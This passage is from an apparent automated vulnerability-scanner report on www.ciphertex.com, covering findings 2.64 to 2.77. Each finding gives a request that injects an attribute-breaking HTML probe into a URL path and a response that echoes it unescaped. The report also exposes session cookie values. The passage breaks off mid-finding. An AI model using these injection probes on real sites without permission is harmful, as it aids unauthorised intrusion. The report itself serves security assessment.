<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-fieldgroup-77d66"><a>596ac13dd54" class="section-sites sidebar-none">
...[SNIP]...

2.64. http://www.ciphertex.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee26c"><a>7338ae6f861 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/theme/content-module.cssee26c"><a>7338ae6f861?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:41 GMT
Vary: Accept-Encoding
Content-Length: 10041
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-theme-content-module.cssee26c"><a>7338ae6f861" class="section-sites sidebar-none">
...[SNIP]...

2.65. http://www.ciphertex.com/sites/all/modules/custom_module/ciphertex.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/custom_module/ciphertex.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13980"><a>17c7c4d864f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/custom_module/ciphertex.js13980"><a>17c7c4d864f?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:07 GMT
Vary: Accept-Encoding
Content-Length: 10037
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-custom_module-ciphertex.js13980"><a>17c7c4d864f" class="section-sites sidebar-none">
...[SNIP]...

2.66. http://www.ciphertex.com/sites/all/modules/date/date_popup/themes/jquery.timeentry.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/date/date_popup/themes/jquery.timeentry.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8009"><a>5c6d01fe2e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/date/d8009"><a>5c6d01fe2e4/themes/jquery.timeentry.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:55 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-date-d8009"><a>5c6d01fe2e4-themes-jquery.timeentry.css" class="section-sites sidebar-none">
...[SNIP]...

2.67. http://www.ciphertex.com/sites/all/modules/filefield/filefield.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac75c"><a>660fd2b4a63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/filefieldac75c"><a>660fd2b4a63/filefield.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:09 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-filefieldac75c"><a>660fd2b4a63-filefield.css" class="section-sites sidebar-none">
...[SNIP]...

2.68. http://www.ciphertex.com/sites/all/modules/galleria/inc/galleria.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/galleria/inc/galleria.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31b37"><a>f41e3e3235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites31b37"><a>f41e3e3235/all/modules/galleria/inc/galleria.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:14 GMT
Vary: Accept-Encoding
Content-Length: 10053
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites31b37"><a>f41e3e3235-all-modules-galleria-inc-galleria.css" class="section-sites31b37">
...[SNIP]...

2.69. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6700"><a>633fc2753a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a6700"><a>633fc2753a2/all/modules/jquery_update/replace/jquery.min.js?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:29 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-a6700"><a>633fc2753a2-all-modules-jquery_update-replace-jquery.min.js" class="section-a6700">
...[SNIP]...

2.70. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733fd"><a>90f5d522738 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/jquery_update/replace/jquery.min.js733fd"><a>90f5d522738?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:08 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-jquery_update-replace-jquery.min.js733fd"><a>90f5d522738" class="section-sites sidebar-none">
...[SNIP]...

2.71. http://www.ciphertex.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9925"><a>9bfb48c88ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitese9925"><a>9bfb48c88ba/all/modules/logintoboggan/logintoboggan.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:31 GMT
Vary: Accept-Encoding
Content-Length: 10068
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitese9925"><a>9bfb48c88ba-all-modules-logintoboggan-logintoboggan.css" class="section-sitese9925">
...[SNIP]...

2.72. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58eb2"><a>af294686ceb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58eb2"><a>af294686ceb/all/modules/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:25 GMT
Vary: Accept-Encoding
Content-Length: 10039
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58eb2"><a>af294686ceb-all-modules-print-css-printlinks.css" class="section-58eb2">
...[SNIP]...

2.73. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f63"><a>93577d2105f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules63f63"><a>93577d2105f/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:36 GMT
Vary: Accept-Encoding
Content-Length: 10033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules63f63"><a>93577d2105f-print-css-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...

2.74. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56553"><a>a1c944e5b2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/print/56553"><a>a1c944e5b2e/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:51 GMT
Vary: Accept-Encoding
Content-Length: 10027
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-print-56553"><a>a1c944e5b2e-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...

2.75. http://www.ciphertex.com/sites/all/modules/tabs/drupal-tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/tabs/drupal-tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94af3"><a>651da2295d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites94af3"><a>651da2295d2/all/modules/tabs/drupal-tabs.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:57 GMT
Vary: Accept-Encoding
Content-Length: 10046
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites94af3"><a>651da2295d2-all-modules-tabs-drupal-tabs.css" class="section-sites94af3">
...[SNIP]...

2.76. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73aab"><a>cc61c204163 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart73aab"><a>cc61c204163/shipping/uc_quote/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart73aab"><a>cc61c204163-shipping-uc_quote-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...

2.77. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a5e"><a>6fbabd2ed7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quoteb1a5e"><a>6fbabd2ed7f/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

